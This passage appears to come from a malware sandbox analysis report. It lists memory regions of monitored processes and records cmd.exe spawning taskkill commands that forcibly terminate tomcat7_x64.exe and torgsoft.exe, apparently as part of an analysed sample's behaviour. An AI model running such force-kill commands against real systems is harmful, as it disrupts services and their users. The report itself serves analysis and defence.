| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00126fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00140000 | 0x00143fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x00160fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x00377fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000600000 | 0x00600000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00750000 | 0x0080ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000990000 | 0x00990000 | 0x009cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x00acffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00b50000 | 0x00b65fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x01f6ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01fdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002030000 | 0x02030000 | 0x0206ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002080000 | 0x02080000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000020e0000 | 0x020e0000 | 0x0211ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x0219ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x021a0000 | 0x0246efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002520000 | 0x02520000 | 0x0255ffff | Private Memory | Readable, Writable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a880000 | 0x6a915fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74b70000 | 0x74bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74bd0000 | 0x74be7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74bf0000 | 0x74bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74c00000 | 0x74c28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c30000 | 0x74c3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c40000 | 0x74c49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c50000 | 0x74c84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c90000 | 0x74c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74ca0000 | 0x74cb0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74cc0000 | 0x74cccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM tomcat7_x64.exe /IM tomcat7_x64.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x61c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
88C
0x
890
0x
6E4
0x
884
0x
678
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00130000 | 0x00133fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x002b0000 | 0x0036ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x003d0000 | 0x003e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005e0000 | 0x005e0000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x0094ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000950000 | 0x00950000 | 0x01d4ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01dfffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e00000 | 0x01e00000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e40000 | 0x01e40000 | 0x01e7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e90000 | 0x01e90000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01fd0000 | 0x0229efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a570000 | 0x6a605fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a830000 | 0x6a91afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74b70000 | 0x74b87fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74b90000 | 0x74b9efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74ba0000 | 0x74bc8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74bd0000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c30000 | 0x74c39fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c40000 | 0x74c4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c50000 | 0x74c58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74c60000 | 0x74c70fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74c80000 | 0x74c8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c90000 | 0x74cc4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM torgsoft.exe /IM torgsoft.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8e4 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
898
0x
8C4
0x
8A0
0x
89C
0x
834
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x002e0000 | 0x0039ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004a0000 | 0x004a0000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006e0000 | 0x006e0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000009a0000 | 0x009a0000 | 0x009dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00baffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x00bb0000 | 0x00e7efff | Memory Mapped File | Readable |
|
|
|
|
| taskkill.exe | 0x00ec0000 | 0x00ed5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000ee0000 | 0x00ee0000 | 0x022dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002300000 | 0x02300000 | 0x0233ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x023dffff | Private Memory | Readable, Writable |
|
|
|
|
| dbghelp.dll | 0x6a520000 | 0x6a60afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a880000 | 0x6a915fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x74b70000 | 0x74bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x74bd0000 | 0x74be7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x74bf0000 | 0x74bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x74c00000 | 0x74c28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x74c30000 | 0x74c3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x74c40000 | 0x74c49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x74c50000 | 0x74c84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x74c90000 | 0x74c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x74ca0000 | 0x74cb0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x74cc0000 | 0x74cccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
